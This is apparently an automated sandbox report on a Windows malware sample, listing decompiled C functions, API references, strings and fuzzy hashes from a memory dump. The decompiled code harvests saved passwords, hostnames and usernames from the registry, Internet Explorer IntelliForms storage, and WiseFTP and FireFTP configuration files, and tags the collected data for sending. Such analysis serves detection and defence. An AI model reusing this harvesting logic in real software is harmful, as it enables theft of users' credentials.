lstrlenW.KERNEL32(?), ref: 0040A36E
wsprintfA.USER32 ref: 0040A3EB
lstrlenW.KERNEL32(?,Software\Microsoft\Internet Explorer\IntelliForms\Storage2,?,?,?,?,?,?), ref: 0040A431
LocalFree.KERNEL32(00000000,?,?), ref: 0040A4AB

Strings

%02X, xrefs: 0040A3B2, 0040A3E2
Software\Microsoft\Internet Explorer\IntelliForms\Storage2, xrefs: 0040A409

Memory Dump Source

Source File: 0000000C.00000001.689692906.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: lstrlen$FreeLocalwsprintf
String ID: %02X$Software\Microsoft\Internet Explorer\IntelliForms\Storage2
API String ID: 63427805-2450551051
Opcode ID: 10276d0c1c107ec45e6a45a57df5954478425b079aa56ba185906d5e51d0d003
Instruction ID: ee62826d35bb7334c94dec01f225b0295fce8fff2f3ff85087ea3677e24ce983
Opcode Fuzzy Hash: 10276d0c1c107ec45e6a45a57df5954478425b079aa56ba185906d5e51d0d003
Instruction Fuzzy Hash: BF414972810218EBDF119BE1EC45BEEBB79AF08314F04403AF910B51A1E7B89965DB59

Uniqueness

Uniqueness Score: -1.00%

Function 004046FB, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 90
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004046FB(intOrPtr _a4, char* _a8) {
				void* _v8;
				int _v12;
				int _v16;
				char _v2064;
				intOrPtr _v2068;
				intOrPtr _v2072;
				intOrPtr _v2076;
				intOrPtr _v2080;
				long _t38;
				long _t39;

				_t38 = RegOpenKeyA( *0x4140fe, _a8,  &_v8); // executed
				_t39 = _t38;
				if(_t39 == 0) {
					_v12 = 0;
					while(1) {
						_v16 = 0x7ff;
						if(RegEnumKeyExA(_v8, _v12,  &_v2064,  &_v16, 0, 0, 0, 0) != 0) {
							break;
						}
						_v2068 = E00401D15(E00401D15(_a8, "\\"),  &_v2064);
						E004017D5(_t44);
						_v2080 = E00401C8E( *0x4140fe, _v2068, "Password", 0);
						_v2072 = E00401C8E( *0x4140fe, _v2068, "HostName", 0);
						_v2076 = E00401C8E( *0x4140fe, _v2068, "User", 0);
						if(_v2080 != 0 && _v2072 != 0 && _v2076 != 0) {
							E00401486(_a4, 0xbeef0000);
							E004014E8(_a4, _v2072);
							E004014E8(_a4, _v2076);
							E004014E8(_a4, _v2080);
						}
						E004017D5(_v2080);
						E004017D5(_v2072);
						E004017D5(_v2076);
						E004046FB(_a4, _v2068);
						E004017D5(_v2068);
						_v12 = _v12 + 1;
					}
					return RegCloseKey(_v8);
				}
				return _t39;
			}

APIs

RegOpenKeyA.ADVAPI32(?,?), ref: 00404711
RegEnumKeyExA.ADVAPI32 ref: 00404745
RegCloseKey.ADVAPI32(?,?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 0040486C

Strings

Password, xrefs: 0040477D
HostName, xrefs: 0040479B
User, xrefs: 004047B9

Memory Dump Source

Source File: 0000000C.00000001.689692906.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CloseEnumOpen
String ID: HostName$Password$User
API String ID: 1332880857-1253078594
Opcode ID: 456df55e986297148e0821ab1377b2a8a1e2b73cd74ff392dbd48bce8802ae55
Instruction ID: 274f6807b80e73b8c345a4adb4ff243209de0c90348e176c4e7a203eb37303a1
Opcode Fuzzy Hash: 456df55e986297148e0821ab1377b2a8a1e2b73cd74ff392dbd48bce8802ae55
Instruction Fuzzy Hash: 0C31077194011CBADF216FA2CC42BDD7AB9BF44304F10C0BAB644751B1EBB95A929F98

Uniqueness

Uniqueness Score: -1.00%

Function 00408C47, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 83
registryCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E00408C47(void* __ecx, intOrPtr _a4, void* _a8, char* _a12) {
				void* _v8;
				int _v12;
				int _v16;
				char _v2064;
				intOrPtr _v2068;
				intOrPtr _v2072;
				intOrPtr _v2076;
				long _t34;
				long _t35;
				intOrPtr _t46;
				intOrPtr _t50;
				void* _t57;

				_t57 = __ecx;
				_t34 = RegOpenKeyA(_a8, _a12,  &_v8); // executed
				_t35 = _t34;
				if(_t35 == 0) {
					_v12 = 0;
					while(1) {
						_v16 = 0x7ff;
						if(RegEnumKeyExA(_v8, _v12,  &_v2064,  &_v16, 0, 0, 0, 0) != 0) {
							break;
						}
						_v2068 = E00401D15(E00401D15(_a12, "\\"),  &_v2064);
						E004017D5(_t40);
						_v2072 = E00401C8E(_a8, _v2068, 0, 0);
						_t46 = E0040234A(__eflags, _v2072);
						__eflags = _t46;
						if(_t46 == 0) {
							L8:
							E004017D5(_v2072);
							E00408C47(_t57, _a4, _a8, _v2068);
							E004017D5(_v2068);
							_v12 = _v12 + 1;
							continue;
						}
						_push(_t46);
						_v2076 = _t46;
						_t50 = E00401E9C(_v2076);
						__eflags = _t50;
						if(_t50 != 0) {
							E00404131(_a4, _v2076, "wiseftpsrvs.ini", 0xbeef0002);
							E00404131(_a4, _v2076, "wiseftp.ini", 0xbeef0002);
							E00404131(_a4, _v2076, "wiseftpsrvs.bin", 0xbeef0000);
						}
						E004017D5();
						goto L8;
					}
					return RegCloseKey(_v8);
				}
				return _t35;
			}

APIs

RegOpenKeyA.ADVAPI32(?,?,?), ref: 00408C5A
RegEnumKeyExA.ADVAPI32 ref: 00408C8E
RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 00408D80

Strings

wiseftpsrvs.bin, xrefs: 00408D36
wiseftpsrvs.ini, xrefs: 00408D06
wiseftp.ini, xrefs: 00408D1E

Memory Dump Source

Source File: 0000000C.00000001.689692906.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CloseEnumOpen
String ID: wiseftp.ini$wiseftpsrvs.bin$wiseftpsrvs.ini
API String ID: 1332880857-3184955129
Opcode ID: 06672daf011954082bece32e1c368350ee560e60d4156fddcc54f2a78b540f3f
Instruction ID: 6933cf3e983a815ab224151528d9636a50beec05a79b4a1705713022bd00aa48
Opcode Fuzzy Hash: 06672daf011954082bece32e1c368350ee560e60d4156fddcc54f2a78b540f3f
Instruction Fuzzy Hash: 2B31287190010CBADF216F61CD42FDDBABABF50304F1080BAB684B51E1DE799A919F98

Uniqueness

Uniqueness Score: -1.00%

Function 0040A4C5, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 75
comCOMMON

Download Yara Rule

C-Code - Quality: 61%

			E0040A4C5(intOrPtr _a4) {
				void* _v8;
				void* _v12;
				short _v44;
				WCHAR* _v48;
				char _v52;
				char _v56;
				short _v60;
				char* _t34;
				void* _t35;
				short* _t45;
				void* _t47;

				_t34 =  &_v8;
				_push(_t34);
				_push(0x415a7d);
				_push(5);
				_push(0);
				_push(0x415a6d); // executed
				L00410DD0(); // executed
				if(_t34 < 0) {
					L15:
					_t35 = E0040A364(_t47, _a4, L"http://www.facebook.com/", 0); // executed
					return _t35;
				}
				_push( &_v12);
				_push(_v8);
				if( *((intOrPtr*)( *_v8 + 0x1c))() < 0 || _v12 == 0) {
					L14:
					 *((intOrPtr*)( *_v8 + 8))(_v8);
					goto L15;
				} else {
					_v48 = 0;
					_v44 = 0;
					_v52 = 0x28;
					while(1) {
						_v56 = 0;
						_push( &_v56);
						_push( &_v52);
						_push(1);
						_push(_v12);
						if( *((intOrPtr*)( *_v12 + 0xc))() != 0 || _v56 != 1) {
							break;
						}
						if(_v48 != 0) {
							_t45 = StrStrIW(_v48, 0x415a9d);
							if(_t45 == 0) {
								_v60 = 0;
							} else {
								 *_t45 = 0;
								_v60 = _t45;
							}
							E0040A364(_t47, _a4, _v48, _v60); // executed
							_push(_v48);
							L00410DCA();
							if(_v44 != 0) {
								_push(_v44);
								L00410DCA();
							}
						}
					}
					 *((intOrPtr*)( *_v12 + 8))(_v12);
					goto L14;
				}
			}

0x0040a4cb
0x0040a4ce
0x0040a4cf
0x0040a4d4
0x0040a4d6
0x0040a4d8
0x0040a4dd
0x0040a4e4
0x0040a5aa
0x0040a5b4
0x0040a5ba
0x0040a5ba
0x0040a4f2
0x0040a4f3
0x0040a4fb
0x0040a59f
0x0040a5a7
0x00000000
0x0040a50b
0x0040a50b
0x0040a512
0x0040a519
0x0040a520
0x0040a520
0x0040a52f
0x0040a533
0x0040a534
0x0040a536
0x0040a53e
0x00000000
0x00000000
0x0040a54a
0x0040a559
0x0040a55b
0x0040a567
0x0040a55d
0x0040a55d
0x0040a562
0x0040a562
0x0040a577
0x0040a57c
0x0040a57f
0x0040a588
0x0040a58a
0x0040a58d
0x0040a58d
0x0040a588
0x0040a592
0x0040a59c
0x00000000
0x0040a59c

APIs

CoCreateInstance.OLE32(00415A6D,00000000,00000005,00415A7D,?), ref: 0040A4DD
StrStrIW.SHLWAPI(00000000,00415A9D), ref: 0040A554
CoTaskMemFree.OLE32(00000000,00000000,00415A9D), ref: 0040A57F
CoTaskMemFree.OLE32(00000000,00000000,00000000,00415A9D), ref: 0040A58D

Strings

http://www.facebook.com/, xrefs: 0040A5AC
(, xrefs: 0040A519

Memory Dump Source

Source File: 0000000C.00000001.689692906.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FreeTask$CreateInstance
String ID: ($http://www.facebook.com/
API String ID: 2903366249-3677894361
Opcode ID: 26fd28d9b999e4cc32093d22da46df2e4bc8434568c89ba86784230ad1d43a58
Instruction ID: e0fdaf64ef7de16aafdf2735d0d685e72c2ce6657ce01d53c8c3a7317b8eeee1
Opcode Fuzzy Hash: 26fd28d9b999e4cc32093d22da46df2e4bc8434568c89ba86784230ad1d43a58
Instruction Fuzzy Hash: BF310530A00209FBDF11DFA0DC85BCEBB75BF08348F248166E500BA290D3799A95DB59

Uniqueness

Uniqueness Score: -1.00%

Function 00409A1D, Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 47
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00409A1D(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4) {
				intOrPtr _v8;
				char _v269;
				void* _t12;
				void* _t23;
				void* _t24;

				_t24 = __edx;
				_t23 = __ecx;
				_v8 = E0040150D(_a4, 0x25, 0);
				_t12 = E00401DCE(__eflags, 0x1a);
				_t26 = _t12;
				if(_t12 != 0) {
					E00404131(_a4, E00401D69(_t12, "\\Mozilla\\Firefox\\"), "fireFTPsites.dat", 0xbeef1000); // executed
					E004017D5(_t20);
				}
				 *0x415824 = 1;
				GetCurrentDirectoryA(0x104,  &_v269);
				E0040988E(_t23, _a4,  *0x4140fe, "Software\\Mozilla", "Firefox", "\\Mozilla\\Firefox\\"); // executed
				E0040988E(_t23, _a4, 0x80000002, "Software\\Mozilla", "Firefox", "\\Mozilla\\Firefox\\"); // executed
				SetCurrentDirectoryA( &_v269);
				return E00401553(_t24, _t26, _a4, _v8);
			}

0x00409a1d
0x00409a1d
0x00409a32
0x00409a3c
0x00409a3c
0x00409a3e
0x00409a5a
0x00409a5f
0x00409a5f
0x00409a64
0x00409a7a
0x00409a97
0x00409ab3
0x00409abf
0x00409ad0

APIs

GetCurrentDirectoryA.KERNEL32(00000104,?), ref: 00409A7A
SetCurrentDirectoryA.KERNEL32(?,?), ref: 00409ABF

Part of subcall function 00401D69: lstrlenA.KERNEL32(?,?,?,004020B8,00000000,?,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,004140DA,00410BE4,00000000,?,00000FFF,00000000,00000000,00000000,00000000), ref: 00401D8A
Part of subcall function 00401D69: lstrlenA.KERNEL32(?,?,?,?,004020B8,00000000,?,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,004140DA,00410BE4,00000000,?,00000FFF,00000000,00000000,00000000), ref: 00401D94
Part of subcall function 00401D69: lstrcpyA.KERNEL32(00000000,?,00000000,?,?,?,?,004020B8,00000000,?,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,004140DA,00410BE4,00000000,?,00000FFF), ref: 00401DA8
Part of subcall function 00401D69: lstrcatA.KERNEL32(00000000,?,00000000,?,00000000,?,?,?,?,004020B8,00000000,?,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,004140DA,00410BE4,00000000), ref: 00401DB1

Part of subcall function 004017D5: LocalFree.KERNEL32(00000000,?,00402BF8), ref: 004017E1

Strings

Firefox, xrefs: 00409A84, 00409AA1
fireFTPsites.dat, xrefs: 00409A51
Software\Mozilla, xrefs: 00409A89, 00409AA6
\Mozilla\Firefox\, xrefs: 00409A40, 00409A7F, 00409A9C

Memory Dump Source

Source File: 0000000C.00000001.689692906.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CurrentDirectorylstrlen$FreeLocallstrcatlstrcpy
String ID: Firefox$Software\Mozilla$\Mozilla\Firefox\$fireFTPsites.dat
API String ID: 3007406096-624000163
Opcode ID: 5764e6e8ef470ff0ed49208cfaf5de5449351cf3b9563aac8ac0db6f1d2449a4
Instruction ID: 60e21d86f469014f8f7ff040f91813a7819b2797126ab95d7269fae31e95df33
Opcode Fuzzy Hash: 5764e6e8ef470ff0ed49208cfaf5de5449351cf3b9563aac8ac0db6f1d2449a4
Instruction Fuzzy Hash: 24017570641608FEEF117FA1CC47FC93A699F84748F104037B608B51E2EABD59E0966C

Uniqueness

Uniqueness Score: -1.00%

Function 0040988E, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 85
registryCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E0040988E(void* __ecx, intOrPtr _a4, void* _a8, char* _a12, char* _a16, intOrPtr _a20) {
				void* _v8;
				char* _v12;
				int _v16;
				int _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				long _t37;
				void* _t48;
				void* _t49;
				intOrPtr _t51;
				void* _t59;

				_t59 = __ecx;
				if(StrStrIA(_a12, _a16) != 0) {
					_t48 = E00401C8E(_a8, _a12, "PathToExe", 0); // executed
					_t49 = _t48;
					_t61 = _t49;
					if(_t49 != 0) {
						_push(_t49);
						_t51 = E0040234A(_t61, _t49);
						_t62 = _t51;
						if(_t51 != 0) {
							_v28 = _t51;
							_t54 = E00401DCE(_t62, 0x1a);
							if(E00401DCE(_t62, 0x1a) != 0) {
								E00409713(_a4, E00401D69(_t54, _a20), _v28);
								E004017D5(_t56);
							}
							E004017D5(_v28);
						}
						E004017D5();
					}
				}
				_v12 = E004017EC(0x800);
				_t37 = RegOpenKeyA(_a8, _a12,  &_v8); // executed
				if(_t37 == 0) {
					_v20 = 0;
					while(1) {
						_v16 = 0x7ff;
						if(RegEnumKeyExA(_v8, _v20, _v12,  &_v16, 0, 0, 0, 0) != 0) {
							break;
						}
						_v24 = E00401D69(E00401D15(_a12, "\\"), _v12);
						E0040988E(_t59, _a4, _a8, _v24, _a16, _a20);
						E004017D5(_v24);
						_v20 = _v20 + 1;
					}
					RegCloseKey(_v8);
				}
				return E004017D5(_v12);
			}

APIs

StrStrIA.SHLWAPI(?,?), ref: 0040989A
RegOpenKeyA.ADVAPI32(?,?,?), ref: 00409911
RegEnumKeyExA.ADVAPI32 ref: 0040993D
RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?,00000800,?,?), ref: 00409985

Part of subcall function 0040234A: lstrlenA.KERNEL32(?,?,00000000), ref: 0040235E
Part of subcall function 0040234A: StrStrIA.SHLWAPI(00000000,.exe,?,?,00000000), ref: 0040237D
Part of subcall function 0040234A: StrRChrIA.SHLWAPI(00000000,00000000,0000005C,00000000,.exe,?,?,00000000), ref: 0040238F
Part of subcall function 0040234A: lstrlenA.KERNEL32(00000000,00000000,00000000,0000005C,00000000,.exe,?,?,00000000), ref: 004023A1

Part of subcall function 00401D69: lstrlenA.KERNEL32(?,?,?,004020B8,00000000,?,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,004140DA,00410BE4,00000000,?,00000FFF,00000000,00000000,00000000,00000000), ref: 00401D8A
Part of subcall function 00401D69: lstrlenA.KERNEL32(?,?,?,?,004020B8,00000000,?,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,004140DA,00410BE4,00000000,?,00000FFF,00000000,00000000,00000000), ref: 00401D94
Part of subcall function 00401D69: lstrcpyA.KERNEL32(00000000,?,00000000,?,?,?,?,004020B8,00000000,?,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,004140DA,00410BE4,00000000,?,00000FFF), ref: 00401DA8
Part of subcall function 00401D69: lstrcatA.KERNEL32(00000000,?,00000000,?,00000000,?,?,?,?,004020B8,00000000,?,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,004140DA,00410BE4,00000000), ref: 00401DB1

Part of subcall function 004017D5: LocalFree.KERNEL32(00000000,?,00402BF8), ref: 004017E1

Strings

PathToExe, xrefs: 004098A5

Memory Dump Source

Source File: 0000000C.00000001.689692906.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: lstrlen$CloseEnumFreeLocalOpenlstrcatlstrcpy
String ID: PathToExe
API String ID: 3012581338-1982016430
Opcode ID: 81213df79e2693ca029aaa92a1708047da5bc6501aa9f1bfd56f0bd47ce8e5ed
Instruction ID: 9921fcbb10fb3e88fa5f2a06c9976cc3b0665bb7c53d4c2d3e03b44b5fdf6235
Opcode Fuzzy Hash: 81213df79e2693ca029aaa92a1708047da5bc6501aa9f1bfd56f0bd47ce8e5ed
Instruction Fuzzy Hash: 65310C7291010EBBDF116FE2CC42FEE7A75AF04304F10403AB610B51F2DA799D61AB59

Uniqueness

Uniqueness Score: -1.00%

Function 00402725, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 82
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E00402725(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				char _v8;
				intOrPtr _v12;
				void* _v16;
				char _v277;
				void* _t23;
				void* _t24;
				long _t27;
				void* _t35;
				void* _t36;
				void** _t41;
				void* _t43;
				void* _t45;
				void* _t51;
				void* _t53;

				_t53 = __edx;
				_t23 = E00401C8E( *0x4140fe, "Software\\WinRAR", _a4, _a8); // executed
				_t24 = _t23;
				if(_t24 != 0) {
					return _t24;
				}
				_t51 = 0;
				_t27 = GetTempPathA(0x104,  &_v277);
				if(_t27 == 0 || _t27 > 0x104) {
					L12:
					return _t51;
				} else {
					E00401000( &_v8, _t53,  &_v8);
					if(E004024D7( &_v277) != 0) {
						_t35 = E00401D15( &_v277, _a4);
					} else {
						_t35 = E00401D69(E00401D15( &_v277, "\\"), _a4);
					}
					_push(_t35);
					_t36 = E004011D5(_t35, _t53, _t35, _v8);
					_t37 = _t36;
					if(_t36 != 0) {
						_v12 = E0040106A(_t37, _t53, _v8);
						if(_v12 != 0) {
							_t41 =  &_v16;
							_push(_t41);
							_push(_v8);
							L00410DBE();
							if(_t41 >= 0) {
								_t43 = GlobalLock(_v16);
								if(_t43 != 0) {
									_t51 = E004017EC(_v12);
									_t45 = _t43;
									E00401823(_t45, _t51, _v12);
									GlobalUnlock(_v16);
									_push(_v12);
									_pop( *__eax);
								}
							}
						}
					}
					E00401019(E004017D5(), _t53, _v8);
					goto L12;
				}
			}

APIs

GetTempPathA.KERNEL32(00000104,?,Software\WinRAR,?,?,?,?,0041049F,Client Hash,?,?,00000000), ref: 0040275B

Part of subcall function 00401000: CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,0040202B,?,?,?,?,00410BE4), ref: 00401010

GetHGlobalFromStream.OLE32(00000000,?,00000000,00000000,00000000,00000000,?,?,?,00000000,00000104,?,Software\WinRAR,?,?), ref: 004027DD
GlobalLock.KERNEL32 ref: 004027E9
GlobalUnlock.KERNEL32(?,00000000,00000000,00000000,00000000,?,00000000,?,00000000,00000000,00000000,00000000,?,?,?,00000000), ref: 0040280B

Part of subcall function 00401D15: lstrlenA.KERNEL32(?,?,?,004020A1,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,004140DA,00410BE4,00000000,?,00000FFF,00000000,00000000,00000000,00000000), ref: 00401D36
Part of subcall function 00401D15: lstrlenA.KERNEL32(?,?,?,?,004020A1,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,004140DA,00410BE4,00000000,?,00000FFF,00000000,00000000,00000000,00000000), ref: 00401D40
Part of subcall function 00401D15: lstrcpyA.KERNEL32(00000000,?,00000000,?,?,?,?,004020A1,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,004140DA,00410BE4,00000000,?,00000FFF,00000000,00000000), ref: 00401D54
Part of subcall function 00401D15: lstrcatA.KERNEL32(00000000,?,00000000,?,00000000,?,?,?,?,004020A1,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,004140DA,00410BE4,00000000,?,00000FFF), ref: 00401D5D

Part of subcall function 00401D69: lstrlenA.KERNEL32(?,?,?,004020B8,00000000,?,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,004140DA,00410BE4,00000000,?,00000FFF,00000000,00000000,00000000,00000000), ref: 00401D8A
Part of subcall function 00401D69: lstrlenA.KERNEL32(?,?,?,?,004020B8,00000000,?,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,004140DA,00410BE4,00000000,?,00000FFF,00000000,00000000,00000000), ref: 00401D94
Part of subcall function 00401D69: lstrcpyA.KERNEL32(00000000,?,00000000,?,?,?,?,004020B8,00000000,?,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,004140DA,00410BE4,00000000,?,00000FFF), ref: 00401DA8
Part of subcall function 00401D69: lstrcatA.KERNEL32(00000000,?,00000000,?,00000000,?,?,?,?,004020B8,00000000,?,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,004140DA,00410BE4,00000000), ref: 00401DB1

Strings

Software\WinRAR, xrefs: 00402735

Memory Dump Source

Source File: 0000000C.00000001.689692906.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Globallstrlen$Streamlstrcatlstrcpy$CreateFromLockPathTempUnlock
String ID: Software\WinRAR
API String ID: 2423343858-224198155
Opcode ID: 7cf850b0c05618a1467c1498a600d9d140c7b85ce8ea629bc749fe13805ec3b9
Instruction ID: 7478491bfa33174de51c22f170f017b73afdc2e34cee783fbd344f0ac75d9f77
Opcode Fuzzy Hash: 7cf850b0c05618a1467c1498a600d9d140c7b85ce8ea629bc749fe13805ec3b9
Instruction Fuzzy Hash: 3C212F76A00109BADF05BBE1CD4A9DDBA7DEF44358F108177B600B20E1E6BD8A949B58

Uniqueness

Uniqueness Score: -1.00%

Function 004045ED, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004045ED(intOrPtr _a4, char* _a8) {
				void* _v8;
				int _v12;
				int _v16;
				char _v2064;
				intOrPtr _v2068;
				int _v2072;
				char _v2076;
				long _t31;
				long _t32;
				intOrPtr _t44;

				_t31 = RegOpenKeyA( *0x4140fe, _a8,  &_v8); // executed
				_t32 = _t31;
				if(_t32 == 0) {
					_v12 = 0;
					while(1) {
						_v16 = 0x7ff;
						if(RegEnumValueA(_v8, _v12,  &_v2064,  &_v16, 0,  &_v2072, 0, 0) != 0) {
							break;
						}
						if(_v2072 == 1 || _v2072 == 7) {
							if(StrStrIA( &_v2064, "Line") == 0) {
								L13:
								_v12 = _v12 + 1;
								continue;
							}
							_t44 = E00401C8E( *0x4140fe, _a8,  &_v2064,  &_v2076);
							if(_t44 == 0) {
								goto L13;
							}
							_v2068 = _t44;
							E00401486(_a4, 0xbeef0001);
							if(_v2072 != 1) {
								E00401486(_a4, 1);
							} else {
								E00401486(_a4, 0);
							}
							E004014BC(_a4, _v2068, _v2076);
							E004017D5(_v2068);
							goto L13;
						} else {
							_v12 = _v12 + 1;
							continue;
						}
					}
					return RegCloseKey(_v8);
				}
				return _t32;
			}

APIs

RegOpenKeyA.ADVAPI32(?,?), ref: 00404603
RegEnumValueA.ADVAPI32 ref: 0040463C
StrStrIA.SHLWAPI(?,Line), ref: 0040466D
RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000001,00000000,00000000,?,Line), ref: 004046F2

Strings

Line, xrefs: 00404661

Memory Dump Source

Source File: 0000000C.00000001.689692906.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CloseEnumOpenValue
String ID: Line
API String ID: 4012628704-1898322888
Opcode ID: 641747fce4c212e13bc605f62b9cee1079d8ed9a9c8af40e1d0c65b7a63f3b00
Instruction ID: 7fcf9f9aae3f6b2ea9e0e0dabca749cb460151442f66bdead352d5342de98d71
Opcode Fuzzy Hash: 641747fce4c212e13bc605f62b9cee1079d8ed9a9c8af40e1d0c65b7a63f3b00
Instruction Fuzzy Hash: EF211C7180011CBADF219B91CC41BED7BB9BF41304F0484B6B644B11A1EB7E9F959F99

Uniqueness

Uniqueness Score: -1.00%

Function 0040E3E5, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 57
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040E3E5(void* __ecx, void* _a4, char* _a8, intOrPtr _a12) {
				void* _v8;
				int _v12;
				int _v16;
				char _v2064;
				char* _v2068;
				int _v2072;
				char _v2076;
				long _t27;
				long _t28;
				char* _t37;
				void* _t43;

				_t43 = __ecx;
				_t27 = RegOpenKeyA(_a4, _a8,  &_v8); // executed
				_t28 = _t27;
				if(_t28 == 0) {
					_v12 = 0;
					while(1) {
						_v16 = 0x7ff;
						if(RegEnumValueA(_v8, _v12,  &_v2064,  &_v16, 0,  &_v2072, 0, 0) != 0) {
							break;
						}
						__eflags = _v2072 - 1;
						if(_v2072 == 1) {
							_t37 = E00401C8E(_a4, _a8,  &_v2064,  &_v2076);
							__eflags = _t37;
							if(_t37 == 0) {
								L10:
								_v12 = _v12 + 1;
								continue;
							}
							_v2068 = _t37;
							__eflags = StrStrIA(_v2068, ".wjf");
							if(__eflags != 0) {
								E0040E163(_t43, __eflags, _a12, _v2068);
							}
							E004017D5(_v2068);
							goto L10;
						}
						_v12 = _v12 + 1;
					}
					return RegCloseKey(_v8);
				}
				return _t28;
			}

APIs

RegOpenKeyA.ADVAPI32(?,?,?), ref: 0040E3F8
RegEnumValueA.ADVAPI32 ref: 0040E431
StrStrIA.SHLWAPI(?,.wjf,00000000,000007FF,?,?), ref: 0040E478
RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,?,00000000,00000000,?,?,?), ref: 0040E4A5

Strings

.wjf, xrefs: 0040E46D

Memory Dump Source

Source File: 0000000C.00000001.689692906.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CloseEnumOpenValue
String ID: .wjf
API String ID: 4012628704-198459012
Opcode ID: 9f7659396e286a54eecc894f8550f607aa07d0afae708ed19e182bd8aa094efd
Instruction ID: 2985ecba4934f64bc87a956b145e7b99f857eac3f65c13796da90851c2a9d639
Opcode Fuzzy Hash: 9f7659396e286a54eecc894f8550f607aa07d0afae708ed19e182bd8aa094efd
Instruction Fuzzy Hash: 0211FC7291010CAADF119B92CC41BEDBBB9BF00304F0484B6A514B41A1DB799EA6AF99

Uniqueness

Uniqueness Score: -1.00%

Function 0040434C, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 54
stringCOMMON

Download Yara Rule

C-Code - Quality: 63%

			E0040434C(void* __ecx, void* __edx) {
				signed char _v5;
				signed char _v6;
				signed char _v7;
				signed char _v8;
				signed char _v9;
				signed char _v10;
				signed char _v11;
				signed char _v12;
				signed short _v14;
				signed short _v16;
				char _v20;
				char _v120;
				char _v124;
				void* _t19;
				char* _t21;

				_t19 = E00402725(__ecx, __edx, "HWID",  &_v124); // executed
				_push(_t19);
				if(_t19 == 0 || _v124 <= 0x14) {
					_t21 =  &_v20;
					_push(_t21);
					L00410DC4();
					if(_t21 >= 0) {
						wsprintfA( &_v120, "{%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X}", _v20, _v16 & 0x0000ffff, _v14 & 0x0000ffff, _v12 & 0x000000ff, _v11 & 0x000000ff, _v10 & 0x000000ff, _v9 & 0x000000ff, _v8 & 0x000000ff, _v7 & 0x000000ff, _v6 & 0x000000ff, _v5 & 0x000000ff);
						E0040260B("HWID",  &_v120, lstrlenA( &_v120));
					}
				}
				return E004017D5();
			}

0x0040435b
0x00404360
0x00404363
0x0040436b
0x0040436e
0x0040436f
0x00404376
0x004043b6
0x004043d1
0x004043d1
0x00404376
0x004043dc

APIs

Part of subcall function 00402725: GetTempPathA.KERNEL32(00000104,?,Software\WinRAR,?,?,?,?,0041049F,Client Hash,?,?,00000000), ref: 0040275B
Part of subcall function 00402725: GetHGlobalFromStream.OLE32(00000000,?,00000000,00000000,00000000,00000000,?,?,?,00000000,00000104,?,Software\WinRAR,?,?), ref: 004027DD
Part of subcall function 00402725: GlobalLock.KERNEL32 ref: 004027E9
Part of subcall function 00402725: GlobalUnlock.KERNEL32(?,00000000,00000000,00000000,00000000,?,00000000,?,00000000,00000000,00000000,00000000,?,?,?,00000000), ref: 0040280B

CoCreateGuid.OLE32(?,00000000,HWID,?), ref: 0040436F
wsprintfA.USER32 ref: 004043B6
lstrlenA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,HWID,?), ref: 004043C2

Strings

{%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X}, xrefs: 004043AD
HWID, xrefs: 00404356, 004043CC

Memory Dump Source

Source File: 0000000C.00000001.689692906.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

